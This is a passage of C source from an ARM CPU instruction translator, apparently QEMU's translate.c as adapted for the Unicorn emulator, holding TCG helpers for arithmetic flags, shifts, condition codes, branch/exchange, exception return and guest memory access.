*/ return s->base.singlestep_enabled || s->ss_active; } static void gen_smul_dual(TCGContext *tcg_ctx, TCGv_i32 a, TCGv_i32 b) { TCGv_i32 tmp1 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 tmp2 = tcg_temp_new_i32(tcg_ctx); tcg_gen_ext16s_i32(tcg_ctx, tmp1, a); tcg_gen_ext16s_i32(tcg_ctx, tmp2, b); tcg_gen_mul_i32(tcg_ctx, tmp1, tmp1, tmp2); tcg_temp_free_i32(tcg_ctx, tmp2); tcg_gen_sari_i32(tcg_ctx, a, a, 16); tcg_gen_sari_i32(tcg_ctx, b, b, 16); tcg_gen_mul_i32(tcg_ctx, b, b, a); tcg_gen_mov_i32(tcg_ctx, a, tmp1); tcg_temp_free_i32(tcg_ctx, tmp1); } /* Byteswap each halfword. */ static void gen_rev16(TCGContext *tcg_ctx, TCGv_i32 dest, TCGv_i32 var) { TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); TCGv_i32 mask = tcg_const_i32(tcg_ctx, 0x00ff00ff); tcg_gen_shri_i32(tcg_ctx, tmp, var, 8); tcg_gen_and_i32(tcg_ctx, tmp, tmp, mask); tcg_gen_and_i32(tcg_ctx, var, var, mask); tcg_gen_shli_i32(tcg_ctx, var, var, 8); tcg_gen_or_i32(tcg_ctx, dest, var, tmp); tcg_temp_free_i32(tcg_ctx, mask); tcg_temp_free_i32(tcg_ctx, tmp); } /* Byteswap low halfword and sign extend. */ static void gen_revsh(TCGContext *tcg_ctx, TCGv_i32 dest, TCGv_i32 var) { tcg_gen_ext16u_i32(tcg_ctx, var, var); tcg_gen_bswap16_i32(tcg_ctx, var, var); tcg_gen_ext16s_i32(tcg_ctx, dest, var); } /* 32x32->64 multiply. Marks inputs as dead. */ static TCGv_i64 gen_mulu_i64_i32(TCGContext *tcg_ctx, TCGv_i32 a, TCGv_i32 b) { TCGv_i32 lo = tcg_temp_new_i32(tcg_ctx); TCGv_i32 hi = tcg_temp_new_i32(tcg_ctx); TCGv_i64 ret; tcg_gen_mulu2_i32(tcg_ctx, lo, hi, a, b); tcg_temp_free_i32(tcg_ctx, a); tcg_temp_free_i32(tcg_ctx, b); ret = tcg_temp_new_i64(tcg_ctx); tcg_gen_concat_i32_i64(tcg_ctx, ret, lo, hi); tcg_temp_free_i32(tcg_ctx, lo); tcg_temp_free_i32(tcg_ctx, hi); return ret; } static TCGv_i64 gen_muls_i64_i32(TCGContext *tcg_ctx, TCGv_i32 a, TCGv_i32 b) { TCGv_i32 lo = tcg_temp_new_i32(tcg_ctx); TCGv_i32 hi = tcg_temp_new_i32(tcg_ctx); TCGv_i64 ret; tcg_gen_muls2_i32(tcg_ctx, lo, hi, a, b); tcg_temp_free_i32(tcg_ctx, a); tcg_temp_free_i32(tcg_ctx, b); ret = tcg_temp_new_i64(tcg_ctx); tcg_gen_concat_i32_i64(tcg_ctx, ret, lo, hi); tcg_temp_free_i32(tcg_ctx, lo); tcg_temp_free_i32(tcg_ctx, hi); return ret; } /* Swap low and high halfwords. */ static void gen_swap_half(TCGContext *tcg_ctx, TCGv_i32 var) { tcg_gen_rotri_i32(tcg_ctx, var, var, 16); } /* Dual 16-bit add. Result placed in t0 and t1 is marked as dead. tmp = (t0 ^ t1) & 0x8000; t0 &= ~0x8000; t1 &= ~0x8000; t0 = (t0 + t1) ^ tmp; */ static void gen_add16(TCGContext *tcg_ctx, TCGv_i32 dest, TCGv_i32 t0, TCGv_i32 t1) { TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); tcg_gen_xor_i32(tcg_ctx, tmp, t0, t1); tcg_gen_andi_i32(tcg_ctx, tmp, tmp, 0x8000); tcg_gen_andi_i32(tcg_ctx, t0, t0, ~0x8000); tcg_gen_andi_i32(tcg_ctx, t1, t1, ~0x8000); tcg_gen_add_i32(tcg_ctx, t0, t0, t1); tcg_gen_xor_i32(tcg_ctx, dest, t0, tmp); tcg_temp_free_i32(tcg_ctx, tmp); } /* Set N and Z flags from var. */ static inline void gen_logic_CC(TCGContext *tcg_ctx, TCGv_i32 var) { tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_NF, var); tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_ZF, var); } /* dest = T0 + T1 + CF. */ static void gen_add_carry(TCGContext *tcg_ctx, TCGv_i32 dest, TCGv_i32 t0, TCGv_i32 t1) { tcg_gen_add_i32(tcg_ctx, dest, t0, t1); tcg_gen_add_i32(tcg_ctx, dest, dest, tcg_ctx->cpu_CF); } /* dest = T0 - T1 + CF - 1. 
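 * (This matches the ARM borrow convention used by SBC: CF = 1 means
 * "no borrow", giving a plain T0 - T1, while CF = 0 subtracts one more.)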
*/ static void gen_sub_carry(TCGContext *tcg_ctx, TCGv_i32 dest, TCGv_i32 t0, TCGv_i32 t1) { tcg_gen_sub_i32(tcg_ctx, dest, t0, t1); tcg_gen_add_i32(tcg_ctx, dest, dest, tcg_ctx->cpu_CF); tcg_gen_subi_i32(tcg_ctx, dest, dest, 1); } /* dest = T0 + T1. Compute C, N, V and Z flags */ static void gen_add_CC(TCGContext *tcg_ctx, TCGv_i32 dest, TCGv_i32 t0, TCGv_i32 t1) { TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); tcg_gen_movi_i32(tcg_ctx, tmp, 0); tcg_gen_add2_i32(tcg_ctx, tcg_ctx->cpu_NF, tcg_ctx->cpu_CF, t0, tmp, t1, tmp); tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_ZF, tcg_ctx->cpu_NF); tcg_gen_xor_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_NF, t0); tcg_gen_xor_i32(tcg_ctx, tmp, t0, t1); tcg_gen_andc_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_VF, tmp); tcg_temp_free_i32(tcg_ctx, tmp); tcg_gen_mov_i32(tcg_ctx, dest, tcg_ctx->cpu_NF); } /* dest = T0 + T1 + CF. Compute C, N, V and Z flags */ static void gen_adc_CC(TCGContext *tcg_ctx, TCGv_i32 dest, TCGv_i32 t0, TCGv_i32 t1) { TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); if (TCG_TARGET_HAS_add2_i32) { tcg_gen_movi_i32(tcg_ctx, tmp, 0); tcg_gen_add2_i32(tcg_ctx, tcg_ctx->cpu_NF, tcg_ctx->cpu_CF, t0, tmp, tcg_ctx->cpu_CF, tmp); tcg_gen_add2_i32(tcg_ctx, tcg_ctx->cpu_NF, tcg_ctx->cpu_CF, tcg_ctx->cpu_NF, tcg_ctx->cpu_CF, t1, tmp); } else { TCGv_i64 q0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 q1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_extu_i32_i64(tcg_ctx, q0, t0); tcg_gen_extu_i32_i64(tcg_ctx, q1, t1); tcg_gen_add_i64(tcg_ctx, q0, q0, q1); tcg_gen_extu_i32_i64(tcg_ctx, q1, tcg_ctx->cpu_CF); tcg_gen_add_i64(tcg_ctx, q0, q0, q1); tcg_gen_extr_i64_i32(tcg_ctx, tcg_ctx->cpu_NF, tcg_ctx->cpu_CF, q0); tcg_temp_free_i64(tcg_ctx, q0); tcg_temp_free_i64(tcg_ctx, q1); } tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_ZF, tcg_ctx->cpu_NF); tcg_gen_xor_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_NF, t0); tcg_gen_xor_i32(tcg_ctx, tmp, t0, t1); tcg_gen_andc_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_VF, tmp); tcg_temp_free_i32(tcg_ctx, tmp); tcg_gen_mov_i32(tcg_ctx, dest, tcg_ctx->cpu_NF); } /* dest = T0 - T1. Compute C, N, V and Z flags */ static void gen_sub_CC(TCGContext *tcg_ctx, TCGv_i32 dest, TCGv_i32 t0, TCGv_i32 t1) { TCGv_i32 tmp; tcg_gen_sub_i32(tcg_ctx, tcg_ctx->cpu_NF, t0, t1); tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_ZF, tcg_ctx->cpu_NF); tcg_gen_setcond_i32(tcg_ctx, TCG_COND_GEU, tcg_ctx->cpu_CF, t0, t1); tcg_gen_xor_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_NF, t0); tmp = tcg_temp_new_i32(tcg_ctx); tcg_gen_xor_i32(tcg_ctx, tmp, t0, t1); tcg_gen_and_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_VF, tmp); tcg_temp_free_i32(tcg_ctx, tmp); tcg_gen_mov_i32(tcg_ctx, dest, tcg_ctx->cpu_NF); } /* dest = T0 + ~T1 + CF. 
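 * (In two's complement ~T1 == -T1 - 1, so this is the same value as
 * T0 - T1 + CF - 1 above; complementing T1 and reusing the ADC flag
 * logic therefore yields the correct SBC result and flags.)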
Compute C, N, V and Z flags */ static void gen_sbc_CC(TCGContext *tcg_ctx, TCGv_i32 dest, TCGv_i32 t0, TCGv_i32 t1) { TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); tcg_gen_not_i32(tcg_ctx, tmp, t1); gen_adc_CC(tcg_ctx, dest, t0, tmp); tcg_temp_free_i32(tcg_ctx, tmp); } #define GEN_SHIFT(name) \ static void gen_##name(TCGContext *tcg_ctx, TCGv_i32 dest, TCGv_i32 t0, TCGv_i32 t1) \ { \ TCGv_i32 tmp1, tmp2, tmp3; \ tmp1 = tcg_temp_new_i32(tcg_ctx); \ tcg_gen_andi_i32(tcg_ctx, tmp1, t1, 0xff); \ tmp2 = tcg_const_i32(tcg_ctx, 0); \ tmp3 = tcg_const_i32(tcg_ctx, 0x1f); \ tcg_gen_movcond_i32(tcg_ctx, TCG_COND_GTU, tmp2, tmp1, tmp3, tmp2, t0); \ tcg_temp_free_i32(tcg_ctx, tmp3); \ tcg_gen_andi_i32(tcg_ctx, tmp1, tmp1, 0x1f); \ tcg_gen_##name##_i32(tcg_ctx, dest, tmp2, tmp1); \ tcg_temp_free_i32(tcg_ctx, tmp2); \ tcg_temp_free_i32(tcg_ctx, tmp1); \ } GEN_SHIFT(shl) GEN_SHIFT(shr) #undef GEN_SHIFT static void gen_sar(TCGContext *tcg_ctx, TCGv_i32 dest, TCGv_i32 t0, TCGv_i32 t1) { TCGv_i32 tmp1, tmp2; tmp1 = tcg_temp_new_i32(tcg_ctx); tcg_gen_andi_i32(tcg_ctx, tmp1, t1, 0xff); tmp2 = tcg_const_i32(tcg_ctx, 0x1f); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_GTU, tmp1, tmp1, tmp2, tmp2, tmp1); tcg_temp_free_i32(tcg_ctx, tmp2); tcg_gen_sar_i32(tcg_ctx, dest, t0, tmp1); tcg_temp_free_i32(tcg_ctx, tmp1); } static void shifter_out_im(TCGContext *tcg_ctx, TCGv_i32 var, int shift) { tcg_gen_extract_i32(tcg_ctx, tcg_ctx->cpu_CF, var, shift, 1); } /* Shift by immediate. Includes special handling for shift == 0. */ static inline void gen_arm_shift_im(TCGContext *tcg_ctx, TCGv_i32 var, int shiftop, int shift, int flags) { switch (shiftop) { case 0: /* LSL */ if (shift != 0) { if (flags) shifter_out_im(tcg_ctx, var, 32 - shift); tcg_gen_shli_i32(tcg_ctx, var, var, shift); } break; case 1: /* LSR */ if (shift == 0) { if (flags) { tcg_gen_shri_i32(tcg_ctx, tcg_ctx->cpu_CF, var, 31); } tcg_gen_movi_i32(tcg_ctx, var, 0); } else { if (flags) shifter_out_im(tcg_ctx, var, shift - 1); tcg_gen_shri_i32(tcg_ctx, var, var, shift); } break; case 2: /* ASR */ if (shift == 0) shift = 32; if (flags) shifter_out_im(tcg_ctx, var, shift - 1); if (shift == 32) shift = 31; tcg_gen_sari_i32(tcg_ctx, var, var, shift); break; case 3: /* ROR/RRX */ if (shift != 0) { if (flags) shifter_out_im(tcg_ctx, var, shift - 1); tcg_gen_rotri_i32(tcg_ctx, var, var, shift); break; } else { TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); tcg_gen_shli_i32(tcg_ctx, tmp, tcg_ctx->cpu_CF, 31); if (flags) shifter_out_im(tcg_ctx, var, 0); tcg_gen_shri_i32(tcg_ctx, var, var, 1); tcg_gen_or_i32(tcg_ctx, var, var, tmp); tcg_temp_free_i32(tcg_ctx, tmp); } } }; static inline void gen_arm_shift_reg(TCGContext *tcg_ctx, TCGv_i32 var, int shiftop, TCGv_i32 shift, int flags) { if (flags) { switch (shiftop) { case 0: gen_helper_shl_cc(tcg_ctx, var, tcg_ctx->cpu_env, var, shift); break; case 1: gen_helper_shr_cc(tcg_ctx, var, tcg_ctx->cpu_env, var, shift); break; case 2: gen_helper_sar_cc(tcg_ctx, var, tcg_ctx->cpu_env, var, shift); break; case 3: gen_helper_ror_cc(tcg_ctx, var, tcg_ctx->cpu_env, var, shift); break; } } else { switch (shiftop) { case 0: gen_shl(tcg_ctx, var, var, shift); break; case 1: gen_shr(tcg_ctx, var, var, shift); break; case 2: gen_sar(tcg_ctx, var, var, shift); break; case 3: tcg_gen_andi_i32(tcg_ctx, shift, shift, 0x1f); tcg_gen_rotr_i32(tcg_ctx, var, var, shift); break; } } tcg_temp_free_i32(tcg_ctx, shift); } /* * Generate a conditional based on ARM condition code cc. * This is common between ARM and Aarch64 targets. 
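 * The low bit of cc selects the inverted sense: each case below computes
 * the test for the even encoding (eq, cs, mi, vs, ...) and the final
 * "cc & 1" check flips the TCG condition for the odd encoding (ne, cc,
 * pl, vc, ...).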
*/ void arm_test_cc(TCGContext *tcg_ctx, DisasCompare *cmp, int cc) { TCGv_i32 value; TCGCond cond; bool global = true; switch (cc) { case 0: /* eq: Z */ case 1: /* ne: !Z */ cond = TCG_COND_EQ; value = tcg_ctx->cpu_ZF; break; case 2: /* cs: C */ case 3: /* cc: !C */ cond = TCG_COND_NE; value = tcg_ctx->cpu_CF; break; case 4: /* mi: N */ case 5: /* pl: !N */ cond = TCG_COND_LT; value = tcg_ctx->cpu_NF; break; case 6: /* vs: V */ case 7: /* vc: !V */ cond = TCG_COND_LT; value = tcg_ctx->cpu_VF; break; case 8: /* hi: C && !Z */ case 9: /* ls: !C || Z -> !(C && !Z) */ cond = TCG_COND_NE; value = tcg_temp_new_i32(tcg_ctx); global = false; /* CF is 1 for C, so -CF is an all-bits-set mask for C; ZF is non-zero for !Z; so AND the two subexpressions. */ tcg_gen_neg_i32(tcg_ctx, value, tcg_ctx->cpu_CF); tcg_gen_and_i32(tcg_ctx, value, value, tcg_ctx->cpu_ZF); break; case 10: /* ge: N == V -> N ^ V == 0 */ case 11: /* lt: N != V -> N ^ V != 0 */ /* Since we're only interested in the sign bit, == 0 is >= 0. */ cond = TCG_COND_GE; value = tcg_temp_new_i32(tcg_ctx); global = false; tcg_gen_xor_i32(tcg_ctx, value, tcg_ctx->cpu_VF, tcg_ctx->cpu_NF); break; case 12: /* gt: !Z && N == V */ case 13: /* le: Z || N != V */ cond = TCG_COND_NE; value = tcg_temp_new_i32(tcg_ctx); global = false; /* (N == V) is equal to the sign bit of ~(NF ^ VF). Propagate * the sign bit then AND with ZF to yield the result. */ tcg_gen_xor_i32(tcg_ctx, value, tcg_ctx->cpu_VF, tcg_ctx->cpu_NF); tcg_gen_sari_i32(tcg_ctx, value, value, 31); tcg_gen_andc_i32(tcg_ctx, value, tcg_ctx->cpu_ZF, value); break; case 14: /* always */ case 15: /* always */ /* Use the ALWAYS condition, which will fold early. * It doesn't matter what we use for the value. */ cond = TCG_COND_ALWAYS; value = tcg_ctx->cpu_ZF; goto no_invert; default: fprintf(stderr, "Bad condition code 0x%x\n", cc); abort(); } if (cc & 1) { cond = tcg_invert_cond(cond); } no_invert: cmp->cond = cond; cmp->value = value; cmp->value_global = global; } void arm_free_cc(TCGContext *tcg_ctx, DisasCompare *cmp) { if (!cmp->value_global) { tcg_temp_free_i32(tcg_ctx, cmp->value); } } void arm_jump_cc(TCGContext *tcg_ctx, DisasCompare *cmp, TCGLabel *label) { tcg_gen_brcondi_i32(tcg_ctx, cmp->cond, cmp->value, 0, label); } void arm_gen_test_cc(TCGContext *tcg_ctx, int cc, TCGLabel *label) { DisasCompare cmp; arm_test_cc(tcg_ctx, &cmp, cc); arm_jump_cc(tcg_ctx, &cmp, label); arm_free_cc(tcg_ctx, &cmp); } static inline void gen_set_condexec(DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (s->condexec_mask) { uint32_t val = (s->condexec_cond << 4) | (s->condexec_mask >> 1); TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); tcg_gen_movi_i32(tcg_ctx, tmp, val); store_cpu_field(tcg_ctx, tmp, condexec_bits); } } static inline void gen_set_pc_im(DisasContext *s, target_ulong val) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_R[15], val); } /* Set PC and Thumb state from var. var is marked as dead. */ static inline void gen_bx(DisasContext *s, TCGv_i32 var) { TCGContext *tcg_ctx = s->uc->tcg_ctx; s->base.is_jmp = DISAS_JUMP; tcg_gen_andi_i32(tcg_ctx, tcg_ctx->cpu_R[15], var, ~1); tcg_gen_andi_i32(tcg_ctx, var, var, 1); store_cpu_field(tcg_ctx, var, thumb); } /* * Set PC and Thumb state from var. var is marked as dead. * For M-profile CPUs, include logic to detect exception-return * branches and handle them. This is needed for Thumb POP/LDM to PC, LDR to PC, * and BX reg, and no others, and happens only for code in Handler mode. 
* The Security Extension also requires us to check for the FNC_RETURN * which signals a function return from non-secure state; this can happen * in both Handler and Thread mode. * To avoid having to do multiple comparisons in inline generated code, * we make the check we do here loose, so it will match for EXC_RETURN * in Thread mode. For system emulation do_v7m_exception_exit() checks * for these spurious cases and returns without doing anything (giving * the same behaviour as for a branch to a non-magic address). * * In linux-user mode it is unclear what the right behaviour for an * attempted FNC_RETURN should be, because in real hardware this will go * directly to Secure code (ie not the Linux kernel) which will then treat * the error in any way it chooses. For QEMU we opt to make the FNC_RETURN * attempt behave the way it would on a CPU without the security extension, * which is to say "like a normal branch". That means we can simply treat * all branches as normal with no magic address behaviour. */ static inline void gen_bx_excret(DisasContext *s, TCGv_i32 var) { /* Generate the same code here as for a simple bx, but flag via * s->base.is_jmp that we need to do the rest of the work later. */ gen_bx(s, var); if (arm_dc_feature(s, ARM_FEATURE_M_SECURITY) || (s->v7m_handler_mode && arm_dc_feature(s, ARM_FEATURE_M))) { s->base.is_jmp = DISAS_BX_EXCRET; } } static inline void gen_bx_excret_final_code(DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* Generate the code to finish possible exception return and end the TB */ TCGLabel *excret_label = gen_new_label(tcg_ctx); uint32_t min_magic; if (arm_dc_feature(s, ARM_FEATURE_M_SECURITY)) { /* Covers FNC_RETURN and EXC_RETURN magic */ min_magic = FNC_RETURN_MIN_MAGIC; } else { /* EXC_RETURN magic only */ min_magic = EXC_RETURN_MIN_MAGIC; } /* Is the new PC value in the magic range indicating exception return? */ tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_GEU, tcg_ctx->cpu_R[15], min_magic, excret_label); /* No: end the TB as we would for a DISAS_JMP */ if (is_singlestepping(s)) { gen_singlestep_exception(s); } else { tcg_gen_exit_tb(tcg_ctx, NULL, 0); } gen_set_label(tcg_ctx, excret_label); /* Yes: this is an exception return. * At this point in runtime env->regs[15] and env->thumb will hold * the exception-return magic number, which do_v7m_exception_exit() * will read. Nothing else will be able to see those values because * the cpu-exec main loop guarantees that we will always go straight * from raising the exception to the exception-handling code. * * gen_ss_advance(s) does nothing on M profile currently but * calling it is conceptually the right thing as we have executed * this instruction (compare SWI, HVC, SMC handling). */ gen_ss_advance(s); gen_exception_internal(tcg_ctx, EXCP_EXCEPTION_EXIT); } static inline void gen_bxns(DisasContext *s, int rm) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 var = load_reg(s, rm); /* The bxns helper may raise an EXCEPTION_EXIT exception, so in theory * we need to sync state before calling it, but: * - we don't need to do gen_set_pc_im() because the bxns helper will * always set the PC itself * - we don't need to do gen_set_condexec() because BXNS is UNPREDICTABLE * unless it's outside an IT block or the last insn in an IT block, * so we know that condexec == 0 (already set at the top of the TB) * is correct in the non-UNPREDICTABLE cases, and we can choose * "zeroes the IT bits" as our UNPREDICTABLE behaviour otherwise. 
*/ gen_helper_v7m_bxns(tcg_ctx, tcg_ctx->cpu_env, var); tcg_temp_free_i32(tcg_ctx, var); s->base.is_jmp = DISAS_EXIT; } static inline void gen_blxns(DisasContext *s, int rm) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 var = load_reg(s, rm); /* We don't need to sync condexec state, for the same reason as bxns. * We do however need to set the PC, because the blxns helper reads it. * The blxns helper may throw an exception. */ gen_set_pc_im(s, s->base.pc_next); gen_helper_v7m_blxns(tcg_ctx, tcg_ctx->cpu_env, var); tcg_temp_free_i32(tcg_ctx, var); s->base.is_jmp = DISAS_EXIT; } /* Variant of store_reg which uses branch&exchange logic when storing to r15 in ARM architecture v7 and above. The source must be a temporary and will be marked as dead. */ static inline void store_reg_bx(DisasContext *s, int reg, TCGv_i32 var) { if (reg == 15 && ENABLE_ARCH_7) { gen_bx(s, var); } else { store_reg(s, reg, var); } } /* Variant of store_reg which uses branch&exchange logic when storing * to r15 in ARM architecture v5T and above. This is used for storing * the results of a LDR/LDM/POP into r15, and corresponds to the cases * in the ARM ARM which use the LoadWritePC() pseudocode function. */ static inline void store_reg_from_load(DisasContext *s, int reg, TCGv_i32 var) { if (reg == 15 && ENABLE_ARCH_5) { gen_bx_excret(s, var); } else { store_reg(s, reg, var); } } #define IS_USER_ONLY 0 /* Abstractions of "generate code to do a guest load/store for * AArch32", where a vaddr is always 32 bits (and is zero * extended if we're a 64 bit core) and data is also * 32 bits unless specifically doing a 64 bit access. * These functions work like tcg_gen_qemu_{ld,st}* except * that the address argument is TCGv_i32 rather than TCGv. */ static inline TCGv gen_aa32_addr(DisasContext *s, TCGv_i32 a32, MemOp op) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv addr = tcg_temp_new(tcg_ctx); tcg_gen_extu_i32_tl(tcg_ctx, addr, a32); /* Not needed for user-mode BE32, where we use MO_BE instead. */ /* Unicorn: by default UC_MODE_BIG_MODE is BE32 mode, which is in fact QEMU user-mode behaviour; thus we only do this in BE8 (QEMU system) mode. */
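/*
 * A worked example of the address munge below: for a byte access (MO_8)
 * the XOR mask is 4 - 1 = 3, so byte addresses 0,1,2,3 within a word map
 * to 3,2,1,0; for a halfword access (MO_16) the mask is 4 - 2 = 2, which
 * swaps the two halfwords. This reproduces big-endian byte lanes on top
 * of a little-endian memory image without byte-swapping the data itself.
 */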
if ( (s->uc->mode & UC_MODE_ARMBE8) && s->sctlr_b && (op & MO_SIZE) < MO_32) { tcg_gen_xori_tl(tcg_ctx, addr, addr, 4 - (1 << (op & MO_SIZE))); } return addr; } static void gen_aa32_ld_i32(DisasContext *s, TCGv_i32 val, TCGv_i32 a32, int index, MemOp opc) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv addr; if (arm_dc_feature(s, ARM_FEATURE_M) && !arm_dc_feature(s, ARM_FEATURE_M_MAIN)) { opc |= MO_ALIGN; } addr = gen_aa32_addr(s, a32, opc); tcg_gen_qemu_ld_i32(tcg_ctx, val, addr, index, opc); tcg_temp_free(tcg_ctx, addr); } static void gen_aa32_st_i32(DisasContext *s, TCGv_i32 val, TCGv_i32 a32, int index, MemOp opc) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv addr; if (arm_dc_feature(s, ARM_FEATURE_M) && !arm_dc_feature(s, ARM_FEATURE_M_MAIN)) { opc |= MO_ALIGN; } addr = gen_aa32_addr(s, a32, opc); tcg_gen_qemu_st_i32(tcg_ctx, val, addr, index, opc); tcg_temp_free(tcg_ctx, addr); } #define DO_GEN_LD(SUFF, OPC) \ static inline void gen_aa32_ld##SUFF(DisasContext *s, TCGv_i32 val, \ TCGv_i32 a32, int index) \ { \ gen_aa32_ld_i32(s, val, a32, index, OPC | s->be_data); \ } #define DO_GEN_ST(SUFF, OPC) \ static inline void gen_aa32_st##SUFF(DisasContext *s, TCGv_i32 val, \ TCGv_i32 a32, int index) \ { \ gen_aa32_st_i32(s, val, a32, index, OPC | s->be_data); \ } static inline void gen_aa32_frob64(DisasContext *s, TCGv_i64 val) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* Not needed for user-mode BE32, where we use MO_BE instead. */ /* Unicorn: by default UC_MODE_BIG_MODE is BE32 mode, which is in fact QEMU user-mode behaviour; thus we only do this in BE8 (QEMU system) mode. */ if ( (s->uc->mode & UC_MODE_ARMBE8) && s->sctlr_b) { tcg_gen_rotri_i64(tcg_ctx, val, val, 32); } } static void gen_aa32_ld_i64(DisasContext *s, TCGv_i64 val, TCGv_i32 a32, int index, MemOp opc) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv addr = gen_aa32_addr(s, a32, opc); tcg_gen_qemu_ld_i64(tcg_ctx, val, addr, index, opc); gen_aa32_frob64(s, val); tcg_temp_free(tcg_ctx, addr); } static inline void gen_aa32_ld64(DisasContext *s, TCGv_i64 val, TCGv_i32 a32, int index) { gen_aa32_ld_i64(s, val, a32, index, MO_Q | s->be_data); } static void gen_aa32_st_i64(DisasContext *s, TCGv_i64 val, TCGv_i32 a32, int index, MemOp opc) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv addr = gen_aa32_addr(s, a32, opc); /* Not needed for user-mode BE32, where we use MO_BE instead. */ /* Unicorn: by default UC_MODE_BIG_MODE is BE32 mode, which is in fact QEMU user-mode behaviour; thus we only do this in BE8 (QEMU system) mode. */ if ( (s->uc->mode & UC_MODE_ARMBE8) && s->sctlr_b) { TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); tcg_gen_rotri_i64(tcg_ctx, tmp, val, 32); tcg_gen_qemu_st_i64(tcg_ctx, tmp, addr, index, opc); tcg_temp_free_i64(tcg_ctx, tmp); } else { tcg_gen_qemu_st_i64(tcg_ctx, val, addr, index, opc); } tcg_temp_free(tcg_ctx, addr); } static inline void gen_aa32_st64(DisasContext *s, TCGv_i64 val, TCGv_i32 a32, int index) { gen_aa32_st_i64(s, val, a32, index, MO_Q | s->be_data); } DO_GEN_LD(8u, MO_UB) DO_GEN_LD(16u, MO_UW) DO_GEN_LD(32u, MO_UL) DO_GEN_ST(8, MO_UB) DO_GEN_ST(16, MO_UW) DO_GEN_ST(32, MO_UL) static inline void gen_hvc(DisasContext *s, int imm16) { /* The pre HVC helper handles cases when HVC gets trapped * as an undefined insn by runtime configuration (ie before * the insn really executes). */ TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_set_pc_im(s, s->pc_curr); gen_helper_pre_hvc(tcg_ctx, tcg_ctx->cpu_env); /* Otherwise we will treat this as a real exception which * happens after execution of the insn.
(The distinction matters * for the PC value reported to the exception handler and also * for single stepping.) */ s->svc_imm = imm16; gen_set_pc_im(s, s->base.pc_next); s->base.is_jmp = DISAS_HVC; } static inline void gen_smc(DisasContext *s) { /* As with HVC, we may take an exception either before or after * the insn executes. */ TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp; gen_set_pc_im(s, s->pc_curr); tmp = tcg_const_i32(tcg_ctx, syn_aa32_smc()); gen_helper_pre_smc(tcg_ctx, tcg_ctx->cpu_env, tmp); tcg_temp_free_i32(tcg_ctx, tmp); gen_set_pc_im(s, s->base.pc_next); s->base.is_jmp = DISAS_SMC; } static void gen_exception_internal_insn(DisasContext *s, uint32_t pc, int excp) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_set_condexec(s); gen_set_pc_im(s, pc); gen_exception_internal(tcg_ctx, excp); s->base.is_jmp = DISAS_NORETURN; } static void gen_exception_insn(DisasContext *s, uint32_t pc, int excp, int syn, uint32_t target_el) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_set_condexec(s); gen_set_pc_im(s, pc); gen_exception(tcg_ctx, excp, syn, target_el); s->base.is_jmp = DISAS_NORETURN; } static void gen_exception_bkpt_insn(DisasContext *s, uint32_t syn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tcg_syn; gen_set_condexec(s); gen_set_pc_im(s, s->pc_curr); tcg_syn = tcg_const_i32(tcg_ctx, syn); gen_helper_exception_bkpt_insn(tcg_ctx, tcg_ctx->cpu_env, tcg_syn); tcg_temp_free_i32(tcg_ctx, tcg_syn); s->base.is_jmp = DISAS_NORETURN; } static void unallocated_encoding(DisasContext *s) { /* Unallocated and reserved encodings are uncategorized */ gen_exception_insn(s, s->pc_curr, EXCP_UDEF, syn_uncategorized(), default_exception_el(s)); } /* Force a TB lookup after an instruction that changes the CPU state. */ static inline void gen_lookup_tb(DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_R[15], s->base.pc_next); s->base.is_jmp = DISAS_EXIT; } static inline void gen_hlt(DisasContext *s, int imm) { /* HLT. This has two purposes. * Architecturally, it is an external halting debug instruction. * Since QEMU doesn't implement external debug, we treat this as * it is required for halting debug disabled: it will UNDEF. * Secondly, "HLT 0x3C" is a T32 semihosting trap instruction, * and "HLT 0xF000" is an A32 semihosting syscall. These traps * must trigger semihosting even for ARMv7 and earlier, where * HLT was an undefined encoding. * In system mode, we don't allow userspace access to * semihosting, to provide some semblance of security * (and for consistency with our 32-bit semihosting). */ unallocated_encoding(s); } static TCGv_ptr get_fpstatus_ptr(TCGContext *tcg_ctx, int neon) { TCGv_ptr statusptr = tcg_temp_new_ptr(tcg_ctx); int offset; if (neon) { 